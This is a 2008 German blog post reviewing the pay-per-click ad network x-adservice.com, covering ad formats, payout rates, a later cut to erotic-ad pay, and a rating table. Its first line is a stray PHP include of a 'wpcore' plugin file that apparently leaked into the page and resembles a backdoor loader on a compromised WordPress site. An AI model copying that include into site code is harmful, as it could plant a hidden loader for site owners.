require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); “Pay per Click” Netzwerk x-adservice.com | Beste-Partnerprogramme.de

“Pay per Click” Netzwerk x-adservice.com

27. Februar 2008
By


Ein durchaus interessanter Anbieter für die Vermarktung von Werbemitteln auf “Pay per Click“-Basis ist x-adservice.com

Hier werden Bild- oder Textanzeigen ausgegeben, die mit einem Festpreis pro Klick vergütet werden.
Die Erstellung der Werbemittel in fast allen gängigen oder frei wählbaren Formaten ist einfach und schnell, die Auszahlung des Guthabens ist bereits ab 10,- EUR möglich.
Einfluss auf die angezeigte Werbung hat man aber (wie üblich in diesem Sektor) nicht.
Möglich sind auch Layer-Anzeigen, die dann mit Pay per View vergütet werden.

Größter Vorteil von x-adservice wird aber wohl sein, dass man auch Erotikanzeigen schalten kann. Nachdem der Markt für klickabhängige Werbemittel doch sehr mager geworden ist, bietet x-adservice das weiterhin an.

Die Pauschalvergütung für Text- und Bildanzeigen aus dem normalen Bereich beträgt 9 Cent pro Klick, die Vergütung für Erotikanzeigen beträgt sogar 10 Cent pro Klick.
Zur Anmeldung bei dem Anbieter geht es hier entlang: x-adservice.com
Update: Leider hat der Anbieter vor einiger Zeit die generelle Vergütung für Anzeigen aus dem Erotikbereich auf 2 Cent pro Klick gesenkt. Es waren wohl zu viele Blogger auf das Erotik-Netzwerk aufmerksam geworden, der Traffic entsprach daher nicht den Werbetreibenden.

Bereich Bewertung
Programmangebot gutschlecht
Verdienstmöglichkeiten gutschlecht
Support gut
Auszahlungen gutschlecht
Innovation schlecht
Serververfügbarkeit/-geschwindigkeit gut

Zeichenerklärung

gutgut = sehr gut
gut = gut
gutschlecht = Mittelmaß
schlecht = schlecht
schlechtschlecht = sehr schlecht

Hinweis:
Dieser Bericht ist unter Umständen unvollständig. Er darf lediglich als Orientierungshilfe dienen und spiegelt nur die subjektiven Eindrücke des Autors wieder.

Tags: , , , , , , , , , , ,

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *